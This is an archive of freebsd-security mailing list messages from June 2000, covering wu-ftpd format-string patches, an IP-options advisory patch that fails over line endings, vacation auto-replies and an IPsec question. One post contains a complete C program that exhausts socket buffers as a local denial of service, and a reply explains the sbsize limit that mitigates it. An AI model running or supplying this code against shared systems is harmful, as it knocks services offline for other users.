2000 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.veriohosting.com (gatekeeper.veriohosting.com [192.41.0.2]) by hub.freebsd.org (Postfix) with ESMTP id CEA8437BA22 for ; Fri, 23 Jun 2000 15:59:19 -0700 (PDT) (envelope-from hart@iserver.com) Received: by gatekeeper.veriohosting.com; Fri, 23 Jun 2000 16:58:48 -0600 (MDT) Received: from unknown(192.168.1.109) by gatekeeper.veriohosting.com via smap (V3.1.1) id xma029241; Fri, 23 Jun 00 16:58:36 -0600 Received: (hart@localhost) by anchovy.orem.iserver.com (8.9.3) id QAA09076; Fri, 23 Jun 2000 16:58:35 -0600 (MDT) Date: Fri, 23 Jun 2000 16:58:35 -0600 (MDT) From: Paul Hart X-Sender: hart@anchovy.orem.iserver.com To: mike@adept.org Cc: freebsd-security@FreeBSD.ORG Subject: Re: Out of Office? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 23 Jun 2000, Mike wrote: > If properly configured, I believe it should send to the From: (which would > be the poster, not the list) not the Reply-To: (the list), and it should > only do that once. Don't even reply once to senders of mailing list messages. Do you think they really care that you're out of the office? Paul Hart -- Paul Robert Hart ><8> ><8> ><8> Verio Web Hosting, Inc. hart@iserver.com ><8> ><8> ><8> http://www.iserver.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 23 16: 3:35 2000 Delivered-To: freebsd-security@freebsd.org Received: from testbed.baileylink.net (testbed.baileylink.net [63.71.213.24]) by hub.freebsd.org (Postfix) with ESMTP id B785437BA5E for ; Fri, 23 Jun 2000 16:03:22 -0700 (PDT) (envelope-from brad@testbed.baileylink.net) Received: (from brad@localhost) by testbed.baileylink.net (8.9.3/8.9.3) id SAA48401; Fri, 23 Jun 2000 18:03:54 -0500 (CDT) (envelope-from brad) Date: Fri, 23 Jun 2000 18:03:54 -0500 From: Brad Guillory To: "Fast, Daniel H (Danny), SITS" Cc: security@FreeBSD.ORG Subject: Re: Out of Office? Message-ID: <20000623180353.A47342@baileylink.net> References: <5D6D2EC6E987D31199EC00902799EC4A020A7BEB@mo3980po01.ems.att.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <5D6D2EC6E987D31199EC00902799EC4A020A7BEB@mo3980po01.ems.att.com>; from fastd@att.com on Fri, Jun 23, 2000 at 05:15:35PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Just make rule (or whatever they call them on exchange servers) that checks the To: field, then reply to messages which match your valid email addresses. Good luck. BMG On Fri, Jun 23, 2000 at 05:15:35PM -0500, Fast, Daniel H (Danny), SITS wrote: > I have outlook [no flames] but I am leaving......and want to turn my out of > office on.....will that respond to the entire list I am on? > > D~y > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- __O | Information wants to be free! | __O Bike _-\<,_ | FreeBSD:The Power to Serve (easily) | _-\<,_ to (_)/ (_) | OpenBSD:The Power to Serve (securely) | (_)/ (_) Work To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 23 18:33: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from smtp03.246.ne.jp (smtp03.246.ne.jp [210.253.192.37]) by hub.freebsd.org (Postfix) with SMTP id 5DA9B37B733 for ; Fri, 23 Jun 2000 18:33:01 -0700 (PDT) (envelope-from y-koga@jp.FreeBSD.org) Received: (qmail 13482 invoked by alias); 24 Jun 2000 10:32:53 +0900 Message-ID: <20000624013253.13481.qmail@smtp.246.ne.jp> Received: (qmail 13449 invoked from network); 24 Jun 2000 10:32:51 +0900 Received: from tp4hr247.246.ne.jp (HELO localhost) (210.253.193.247) by smtp.246.ne.jp with SMTP; 24 Jun 2000 10:32:51 +0900 To: wollman@khavrinen.lcs.mit.edu Cc: silby@silby.com, freebsd-security@FreeBSD.ORG Subject: Re: Fwd: WuFTPD: Providing *remote* root since at least1994 In-Reply-To: <200006231713.NAA49665@khavrinen.lcs.mit.edu> References: <4.2.2.20000622201823.0479a690@mail.sentex.net> <200006231713.NAA49665@khavrinen.lcs.mit.edu> X-Mailer: Mew version 1.94.2 on Emacs 19.28 / Mule 2.3 (SUETSUMUHANA) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Date: Sat, 24 Jun 2000 10:32:21 +0900 From: Koga Youichirou X-Dispatcher: imput version 20000228(IM140) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Garrett Wollman : > Here's a patch (mangled by cut&paste) which hacks around the problem. Debian team has already released a fixed package. A patch is available from: http://security.debian.org/dists/potato/updates/main/source/wu-ftpd_2.6.0-5.1.diff.gz Then I checked it and I found that there are some other undesirable codes in ftpd.c. Probably these codes do not lead to security flaw, but I think that they should be corrected. Following patch corrects them (incl. a part of debian's patch), and I have sent it to wu-ftpd development team. Index: ftpcmd.y =================================================================== RCS file: /usr/cvs/src/wu-ftpd/src/ftpcmd.y,v retrieving revision 1.1.1.1 diff -u -r1.1.1.1 ftpcmd.y --- ftpcmd.y 1999/10/21 11:50:51 1.1.1.1 +++ ftpcmd.y 2000/06/23 08:19:30 @@ -1926,13 +1926,13 @@ } if (!maxfound) maxlines = defmaxlines; - lreply(200, cmd); + lreply(200, "%s", cmd); while (fgets(buf, sizeof buf, cmdf)) { size_t len = strlen(buf); if (len > 0 && buf[len - 1] == '\n') buf[--len] = '\0'; - lreply(200, buf); + lreply(200, "%s", buf); if (maxlines <= 0) ++lines; else if (++lines >= maxlines) { Index: ftpd.c =================================================================== RCS file: /usr/cvs/src/wu-ftpd/src/ftpd.c,v retrieving revision 1.1.1.1.2.10 diff -u -r1.1.1.1.2.10 ftpd.c --- ftpd.c 2000/03/17 02:01:57 1.1.1.1.2.10 +++ ftpd.c 2000/06/23 08:47:21 @@ -2012,9 +2012,9 @@ s = strsep(&cp, "\n"); if (cp == NULL || *cp == '\0') break; - lreply(331, s); + lreply(331, "%s", s); } - reply(331, s); + reply(331, "%s", s); } else { #endif @@ -2495,7 +2495,7 @@ #ifdef BSD_AUTH if (ext_auth) { if ((salt = check_auth(the_user, passwd))) { - reply(530, salt); + reply(530, "%s", salt); #ifdef LOG_FAILED /* 27-Apr-93 EHK/BM */ syslog(LOG_INFO, "failed login from %s", remoteident); @@ -3160,7 +3160,7 @@ reply(230, "User %s logged in.%s", pw->pw_name, guest ? " Access restrictions apply." : ""); sprintf(proctitle, "%s: %s", remotehost, pw->pw_name); - setproctitle(proctitle); + setproctitle("%s", proctitle); if (logging) syslog(LOG_INFO, "FTP LOGIN FROM %s, %s", remoteident, pw->pw_name); /* H* mod: if non-anonymous user, copy it to "authuser" so everyone can @@ -5908,7 +5908,7 @@ remotehost[sizeof(remotehost) - 1] = '\0'; sprintf(proctitle, "%s: connected", remotehost); - setproctitle(proctitle); + setproctitle("%s", proctitle); wu_authenticate(); /* Create a composite source identification string, to improve the logging @@ -6318,7 +6318,7 @@ dirlist = ftpglob(whichfiles); sdirlist = dirlist; /* save to free later */ if (globerr != NULL) { - reply(550, globerr); + reply(550, "%s", globerr); goto globfree; } else if (dirlist == NULL) { Regards, -- Koga, Youichirou To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 23 19: 1:54 2000 Delivered-To: freebsd-security@freebsd.org Received: from mics.co.za (saturn.mics.co.za [196.34.165.130]) by hub.freebsd.org (Postfix) with ESMTP id B62A637B778 for ; Fri, 23 Jun 2000 19:01:42 -0700 (PDT) (envelope-from christiaan@mics.co.za) Received: from vision.boxlet.co.za ([196.34.165.140] helo=mics.co.za ident=vision) by mics.co.za with esmtp (Exim 3.13 #1) id 135fGe-0003p6-00 for security@freebsd.org; Sat, 24 Jun 2000 04:01:56 +0200 Message-ID: <39541671.84FFC647@mics.co.za> Date: Sat, 24 Jun 2000 04:01:22 +0200 From: Christiaan Rademan Organization: MICS X-Mailer: Mozilla 4.72 [en] (X11; I; FreeBSD 4.0-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: security@freebsd.org Subject: Security Bug. Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi. I am hosting a shell server, for my dialup users at a ISP. We have one slight problem, there is a DoS attack that affects FBSD4.0Stable locally and other FBSD releases. If the DoS attack is runned locally, the system stops accepting connections then die's off. Here is the bug... :-) if there is a patch already please post it here... #include #include #include #define BUFFERSIZE 204800 extern int main(void) { int p[2], i; char crap[BUFFERSIZE]; while (1) { if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1) break; i = BUFFERSIZE; setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); fcntl(p[0], F_SETFL, O_NONBLOCK); fcntl(p[1], F_SETFL, O_NONBLOCK); write(p[0], crap, BUFFERSIZE); write(p[1], crap, BUFFERSIZE); } exit(0); } To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 23 20:40:43 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns2.intertek.net (ns2.intertek.net [209.83.158.3]) by hub.freebsd.org (Postfix) with ESMTP id 4D64D37B7F9 for ; Fri, 23 Jun 2000 20:40:35 -0700 (PDT) (envelope-from chancedj@intertek.net) Received: from satan (oflil078.intertek.net [209.83.158.78]) by ns2.intertek.net (8.9.3/8.9.3) with SMTP id WAA14361 for ; Fri, 23 Jun 2000 22:36:58 -0500 Message-ID: <016901bfdd8e$5a96f3c0$0200000a@gateway.intertek.net> From: "Daryl Chance" To: "FreeBSD Security2" References: Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-00:23.ip-options Date: Fri, 23 Jun 2000 22:43:25 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6600 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Todd: I tried updating my dialup box and got the same thing. a quick vi on the file and I noticed that there were ^M's dostounix checked again, and all was gone...patched and it patched cleanly. I figured you've probably checked there already, but it never hurts to ask :). Daryl ----- Original Message ----- From: "Todd Backman" To: Sent: Thursday, June 22, 2000 7:01 PM Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-00:23.ip-options > > So, upon following the instructions for patch on the SA (including DL'ing > the patch from the ftp site) I get the following: > > **** START **** > > stuff# patch -p < ip-options.diff > Hmm... Looks like a unified diff to me... > The text leading up to this was: > -------------------------- > |Index: ip_icmp.c > |=================================================================== > |RCS file: /ncvs/src/sys/netinet/ip_icmp.c,v > |retrieving revision 1.39 > |diff -u -r1.39 ip_icmp.c > |--- ip_icmp.c 2000/01/28 06:13:09 1.39 > |+++ ip_icmp.c 2000/06/08 15:26:39 > -------------------------- > Patching file ip_icmp.c using Plan A... > Hunk #1 failed at 662. > 1 out of 1 hunks failed--saving rejects to ip_icmp.c.rej > Hmm... The next patch looks like a unified diff to me... > The text leading up to this was: > -------------------------- > |Index: ip_input.c > |=================================================================== > |RCS file: /ncvs/src/sys/netinet/ip_input.c,v > |retrieving revision 1.130 > |diff -u -r1.130 ip_input.c > |--- ip_input.c 2000/02/23 20:11:57 1.130 > |+++ ip_input.c 2000/06/08 15:25:46 > -------------------------- > Patching file ip_input.c using Plan A... > Hunk #1 failed at 1067. > Hunk #2 failed at 1178. > 2 out of 2 hunks failed--saving rejects to ip_input.c.rej > Hmm... The next patch looks like a unified diff to me... > The text leading up to this was: > -------------------------- > |Index: ip_output.c > |=================================================================== > |RCS file: /ncvs/src/sys/netinet/ip_output.c,v > |retrieving revision 1.99 > |diff -u -r1.99 ip_output.c > |--- ip_output.c 2000/03/09 14:57:15 1.99 > |+++ ip_output.c 2000/06/08 15:27:08 > -------------------------- > Patching file ip_output.c using Plan A... > Hunk #1 failed at 1302. > 1 out of 1 hunks failed--saving rejects to ip_output.c.rej > done > > **** FINISH **** > > Can anyone hit me with the cluestick? > > Thanks. > > - Todd > > > On Thu, 22 Jun 2000, FreeBSD Security Advisories wrote: > > > # cd /usr/src/sys/netinet > > # patch -p < /path/to/patch_or_advisory > > > > Index: ip_icmp.c > > =================================================================== > > RCS file: /ncvs/src/sys/netinet/ip_icmp.c,v > > retrieving revision 1.39 > > diff -u -r1.39 ip_icmp.c > > --- ip_icmp.c 2000/01/28 06:13:09 1.39 > > +++ ip_icmp.c 2000/06/08 15:26:39 > > @@ -662,8 +662,11 @@ > > if (opt == IPOPT_NOP) > > len = 1; > > else { > > + if (cnt < IPOPT_OLEN + sizeof(*cp)) > > + break; > > len = cp[IPOPT_OLEN]; > > - if (len <= 0 || len > cnt) > > + if (len < IPOPT_OLEN + sizeof(*cp) || > > + len > cnt) > > break; > > } > > /* > > Index: ip_input.c > > =================================================================== > > RCS file: /ncvs/src/sys/netinet/ip_input.c,v > > retrieving revision 1.130 > > diff -u -r1.130 ip_input.c > > --- ip_input.c 2000/02/23 20:11:57 1.130 > > +++ ip_input.c 2000/06/08 15:25:46 > > @@ -1067,8 +1067,12 @@ > > if (opt == IPOPT_NOP) > > optlen = 1; > > else { > > + if (cnt < IPOPT_OLEN + sizeof(*cp)) { > > + code = &cp[IPOPT_OLEN] - (u_char *)ip; > > + goto bad; > > + } > > optlen = cp[IPOPT_OLEN]; > > - if (optlen <= 0 || optlen > cnt) { > > + if (optlen < IPOPT_OLEN + sizeof(*cp) || optlen > cnt) { > > code = &cp[IPOPT_OLEN] - (u_char *)ip; > > goto bad; > > } > > @@ -1174,6 +1178,10 @@ > > break; > > > > case IPOPT_RR: > > + if (optlen < IPOPT_OFFSET + sizeof(*cp)) { > > + code = &cp[IPOPT_OFFSET] - (u_char *)ip; > > + goto bad; > > + } > > if ((off = cp[IPOPT_OFFSET]) < IPOPT_MINOFF) { > > code = &cp[IPOPT_OFFSET] - (u_char *)ip; > > goto bad; > > Index: ip_output.c > > =================================================================== > > RCS file: /ncvs/src/sys/netinet/ip_output.c,v > > retrieving revision 1.99 > > diff -u -r1.99 ip_output.c > > --- ip_output.c 2000/03/09 14:57:15 1.99 > > +++ ip_output.c 2000/06/08 15:27:08 > > @@ -1302,8 +1302,10 @@ > > if (opt == IPOPT_NOP) > > optlen = 1; > > else { > > + if (cnt < IPOPT_OLEN + sizeof(*cp)) > > + goto bad; > > optlen = cp[IPOPT_OLEN]; > > - if (optlen <= IPOPT_OLEN || optlen > cnt) > > + if (optlen < IPOPT_OLEN + sizeof(*cp) || optlen > cnt) > > goto bad; > > } > > switch (opt) { > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 23 20:42:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from scientia.demon.co.uk (scientia.demon.co.uk [212.228.14.13]) by hub.freebsd.org (Postfix) with ESMTP id 0A75837BB75 for ; Fri, 23 Jun 2000 20:42:15 -0700 (PDT) (envelope-from ben@scientia.demon.co.uk) Received: from strontium.scientia.demon.co.uk ([192.168.91.36] ident=exim) by scientia.demon.co.uk with esmtp (Exim 3.15 #1) id 135dGX-000CRM-00; Sat, 24 Jun 2000 00:53:41 +0100 Received: (from ben) by strontium.scientia.demon.co.uk (Exim 3.15 #1) id 135dGW-0005Cu-00; Sat, 24 Jun 2000 00:53:40 +0100 Date: Sat, 24 Jun 2000 00:53:40 +0100 From: Ben Smithurst To: Mike Cc: "Fast, Daniel H (Danny), SITS" , security@FreeBSD.ORG Subject: Re: Out of Office? Message-ID: <20000624005340.Y57917@strontium.scientia.demon.co.uk> References: <5D6D2EC6E987D31199EC00902799EC4A020A7BEB@mo3980po01.ems.att.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="Nm48CqPeykZpOG4/" Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --Nm48CqPeykZpOG4/ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Mike wrote: > If properly configured, I believe it should send to the From: (which would > be the poster, not the list) not the Reply-To: (the list), and it should > only do that once. I think you'll find the FreeBSD list admin has Clue, so the Reply-To on these lists is *NOT* set to the list address. Thank god. Vacation programs should only respond to personal mail -- when I post to a list I do *NOT* want god only knows how many people's vacation crap in my inbox a few minutes later. By 'personal' I mean either 'To' or 'Cc' contains your mail address, that's how vacation(1) works I believe. --=20 Ben Smithurst / ben@scientia.demon.co.uk / PGP: 0x99392F7D --Nm48CqPeykZpOG4/ Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use MessageID: N16RO2sp9s3GCAp21qsb3RJktlLtwLJ3 iQCVAwUBOVP4hCsPVtiZOS99AQEx7wQAo7qQeMAq9Gc8csuh1KeSHFt/ePN6a+JI GTzeHhDlWg9f2yHhCEI7ErAzcbwHpYOoIHu8BKdCeFQfRbcuxa+GAAO+t65Nh0eQ I0ks2s0UjAGvE5wLYQ/7Xz7JZFFBuk23+Km7MYu56l0srHZvIT3MEoTaJ2Qo99IF pVzKzpio1bA= =vr3F -----END PGP SIGNATURE----- --Nm48CqPeykZpOG4/-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 23 21:13:55 2000 Delivered-To: freebsd-security@freebsd.org Received: from sivka.rdy.com (sivka.rdy.com [207.33.166.86]) by hub.freebsd.org (Postfix) with ESMTP id ED06837B507 for ; Fri, 23 Jun 2000 21:13:39 -0700 (PDT) (envelope-from dima@rdy.com) Received: (from dima@localhost) by sivka.rdy.com (8.9.3/8.9.3) id VAA82687; Fri, 23 Jun 2000 21:11:46 -0700 (PDT) (envelope-from dima) Message-Id: <200006240411.VAA82687@sivka.rdy.com> Subject: Re: Fwd: WuFTPD: Providing *remote* root since at least1994 In-Reply-To: <20000624013253.13481.qmail@smtp.246.ne.jp> "from Koga Youichirou at Jun 24, 2000 10:32:21 am" To: Koga Youichirou Date: Fri, 23 Jun 2000 21:11:46 -0700 (PDT) Cc: wollman@khavrinen.lcs.mit.edu, silby@silby.com, freebsd-security@FreeBSD.ORG Organization: HackerDome Reply-To: dima@rdy.com From: dima@rdy.com (Dima Ruban) X-Mailer: ELM [version 2.4ME+ PL77 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org What's the purpose of this patch? I didn't look at the code, but to me it sounds like it's pretty much irrelevant whether you gonna use ``foo(fmt, string)'' or ``foo(string)'' Koga Youichirou writes: > Garrett Wollman : > > Here's a patch (mangled by cut&paste) which hacks around the problem. > > Debian team has already released a fixed package. > A patch is available from: > > http://security.debian.org/dists/potato/updates/main/source/wu-ftpd_2.6.0-5.1.diff.gz > > Then I checked it and I found that there are some other undesirable > codes in ftpd.c. Probably these codes do not lead to security flaw, > but I think that they should be corrected. > > Following patch corrects them (incl. a part of debian's patch), > and I have sent it to wu-ftpd development team. > > Index: ftpcmd.y > =================================================================== > RCS file: /usr/cvs/src/wu-ftpd/src/ftpcmd.y,v > retrieving revision 1.1.1.1 > diff -u -r1.1.1.1 ftpcmd.y > --- ftpcmd.y 1999/10/21 11:50:51 1.1.1.1 > +++ ftpcmd.y 2000/06/23 08:19:30 > @@ -1926,13 +1926,13 @@ > } > if (!maxfound) > maxlines = defmaxlines; > - lreply(200, cmd); > + lreply(200, "%s", cmd); > while (fgets(buf, sizeof buf, cmdf)) { > size_t len = strlen(buf); > > if (len > 0 && buf[len - 1] == '\n') > buf[--len] = '\0'; > - lreply(200, buf); > + lreply(200, "%s", buf); > if (maxlines <= 0) > ++lines; > else if (++lines >= maxlines) { > Index: ftpd.c > =================================================================== > RCS file: /usr/cvs/src/wu-ftpd/src/ftpd.c,v > retrieving revision 1.1.1.1.2.10 > diff -u -r1.1.1.1.2.10 ftpd.c > --- ftpd.c 2000/03/17 02:01:57 1.1.1.1.2.10 > +++ ftpd.c 2000/06/23 08:47:21 > @@ -2012,9 +2012,9 @@ > s = strsep(&cp, "\n"); > if (cp == NULL || *cp == '\0') > break; > - lreply(331, s); > + lreply(331, "%s", s); > } > - reply(331, s); > + reply(331, "%s", s); > } > else { > #endif > @@ -2495,7 +2495,7 @@ > #ifdef BSD_AUTH > if (ext_auth) { > if ((salt = check_auth(the_user, passwd))) { > - reply(530, salt); > + reply(530, "%s", salt); > #ifdef LOG_FAILED /* 27-Apr-93 EHK/BM */ > syslog(LOG_INFO, "failed login from %s", > remoteident); > @@ -3160,7 +3160,7 @@ > reply(230, "User %s logged in.%s", pw->pw_name, guest ? > " Access restrictions apply." : ""); > sprintf(proctitle, "%s: %s", remotehost, pw->pw_name); > - setproctitle(proctitle); > + setproctitle("%s", proctitle); > if (logging) > syslog(LOG_INFO, "FTP LOGIN FROM %s, %s", remoteident, pw->pw_name); > /* H* mod: if non-anonymous user, copy it to "authuser" so everyone can > @@ -5908,7 +5908,7 @@ > > remotehost[sizeof(remotehost) - 1] = '\0'; > sprintf(proctitle, "%s: connected", remotehost); > - setproctitle(proctitle); > + setproctitle("%s", proctitle); > > wu_authenticate(); > /* Create a composite source identification string, to improve the logging > @@ -6318,7 +6318,7 @@ > dirlist = ftpglob(whichfiles); > sdirlist = dirlist; /* save to free later */ > if (globerr != NULL) { > - reply(550, globerr); > + reply(550, "%s", globerr); > goto globfree; > } > else if (dirlist == NULL) { > > > Regards, > > -- Koga, Youichirou > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- dima To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 23 21:36:40 2000 Delivered-To: freebsd-security@freebsd.org Received: from decoy.sfc.keio.ac.jp (decoy.sfc.keio.ac.jp [133.27.84.101]) by hub.freebsd.org (Postfix) with ESMTP id 52AAD37BB23 for ; Fri, 23 Jun 2000 21:36:27 -0700 (PDT) (envelope-from say@sfc.wide.ad.jp) Received: from localhost (localhost.sfc.keio.ac.jp [127.0.0.1]) by decoy.sfc.keio.ac.jp (8.9.3/8.9.3) with ESMTP id NAA06961; Sat, 24 Jun 2000 13:35:50 +0900 (JST) (envelope-from say@sfc.wide.ad.jp) To: adsharma@sharmas.dhs.org Cc: security@FreeBSD.ORG Subject: Re: FreeBSD 4.0 ipsec and Nortel extranet From: ARIGA Seiji In-Reply-To: <20000623081828.A963@sharmas.dhs.org> References: <20000623081828.A963@sharmas.dhs.org> X-Mailer: Mew version 1.95b3 on Emacs 20.7 / Mule 4.0 (HANANOEN) X-PGP-Publickey: http://decoy.sfc.keio.ac.jp/~say/key.txt X-PGP-Fingerprint: 8E 70 AB 20 44 E6 8A 8A 1C 49 B3 30 44 1B B3 BA Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-Id: <20000624133548P.say@decoy.sfc.keio.ac.jp> Date: Sat, 24 Jun 2000 13:35:48 +0900 X-Dispatcher: imput version 991025(IM133) Lines: 15 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, On Fri, 23 Jun 2000 08:18:28 -0700, Arun Sharma wrote, : My work place uses Nortel extranet ipsec for VPN and I'm forced to : connect using my windows box. I was wondering if anyone had any : success connecting a FreeBSD box to the Nortel server. I'm afraid that nobody has connected FreeBSD box to the Nortel server yet. If you try to do that, you'd better use latest KAME snap (http://www.kame.net). And if you don't mind, please send the result to snap-users@kame.net. // ARIGA Seiji To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 23 22: 2:13 2000 Delivered-To: freebsd-security@freebsd.org Received: from obie.softweyr.com (obie.softweyr.com [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id 6B48337B72C for ; Fri, 23 Jun 2000 22:02:07 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from softweyr.com (Foolstrustident!@homer.softweyr.com [204.68.178.39]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id XAA15000; Fri, 23 Jun 2000 23:01:37 -0600 (MDT) (envelope-from wes@softweyr.com) Message-ID: <3954410B.5716EE5D@softweyr.com> Date: Fri, 23 Jun 2000 23:03:07 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.7 [en] (X11; U; FreeBSD 4.0-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: dima@rdy.com Cc: Koga Youichirou , wollman@khavrinen.lcs.mit.edu, silby@silby.com, freebsd-security@FreeBSD.ORG Subject: Re: Fwd: WuFTPD: Providing *remote* root since at least1994 References: <200006240411.VAA82687@sivka.rdy.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Dima Ruban wrote: > > What's the purpose of this patch? > I didn't look at the code, but to me it sounds like it's pretty much > irrelevant whether you gonna use ``foo(fmt, string)'' or ``foo(string)'' If string contains formatting codes, foo("%s", string) does the right thing and just puts out the formatting codes in the string. foo(string) tries to interpret the embedded format codes and blows the stack. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 23 22:11:42 2000 Delivered-To: freebsd-security@freebsd.org Received: from field.videotron.net (field.videotron.net [205.151.222.108]) by hub.freebsd.org (Postfix) with ESMTP id 84D6237BB3C for ; Fri, 23 Jun 2000 22:11:34 -0700 (PDT) (envelope-from bmilekic@dsuper.net) Received: from modemcable009.62-201-24.mtl.mc.videotron.net ([24.201.62.9]) by field.videotron.net (Sun Internet Mail Server sims.3.5.1999.12.14.10.29.p8) with ESMTP id <0FWN00CG07PVT6@field.videotron.net> for security@FreeBSD.ORG; Sat, 24 Jun 2000 01:10:43 -0400 (EDT) Date: Sat, 24 Jun 2000 01:12:38 -0400 (EDT) From: Bosko Milekic Subject: Re: Security Bug. In-reply-to: <39541671.84FFC647@mics.co.za> X-Sender: bmilekic@jehovah.technokratis.com To: Christiaan Rademan Cc: security@FreeBSD.ORG Message-id: MIME-version: 1.0 Content-type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 24 Jun 2000, Christiaan Rademan wrote: > Hi. > > I am hosting a shell server, for my dialup users at a ISP. That's problem #1. :-) > We have one slight problem, there is a DoS attack that affects > FBSD4.0Stable locally > and other FBSD releases. > > If the DoS attack is runned locally, the system stops accepting > connections then die's off. > > Here is the bug... :-) if there is a patch already please post it > here... This is a resource exhaustion, previously it panic-ed the machine. It no longer does. Also, the socket buffer size (sbsize) limit very much exists. The fact that you haven't carefully read login.conf(5) and are running a public shell server is problem #2. [...] Hope this helps, Bosko. -- Bosko Milekic * Voice/Mobile: 514.865.7738 * Pager: 514.921.0237 bmilekic@technokratis.com * http://www.technokratis.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 24 4:39:25 2000 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 542) id 9DDDB37BC1C; Sat, 24 Jun 2000 04:39:22 -0700 (PDT) Date: Sat, 24 Jun 2000 04:39:22 -0700 From: "Andrey A. Chernov" To: Koga Youichirou Cc: wollman@khavrinen.lcs.mit.edu, silby@silby.com, freebsd-security@FreeBSD.ORG Subject: Re: Fwd: WuFTPD: Providing *remote* root since at least1994 Message-ID: <20000624043922.A64898@freebsd.org> References: <4.2.2.20000622201823.0479a690@mail.sentex.net> <200006231713.NAA49665@khavrinen.lcs.mit.edu> <20000624013253.13481.qmail@smtp.246.ne.jp> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <20000624013253.13481.qmail@smtp.246.ne.jp>; from y-koga@jp.FreeBSD.org on Sat, Jun 24, 2000 at 10:32:21AM +0900 Organization: Biomechanoid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, Jun 24, 2000 at 10:32:21AM +0900, Koga Youichirou wrote: > Following patch corrects them (incl. a part of debian's patch), > and I have sent it to wu-ftpd development team. Thanx, commited. -- Andrey A. Chernov http://ache.pp.ru/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 24 12:16: 9 2000 Delivered-To: 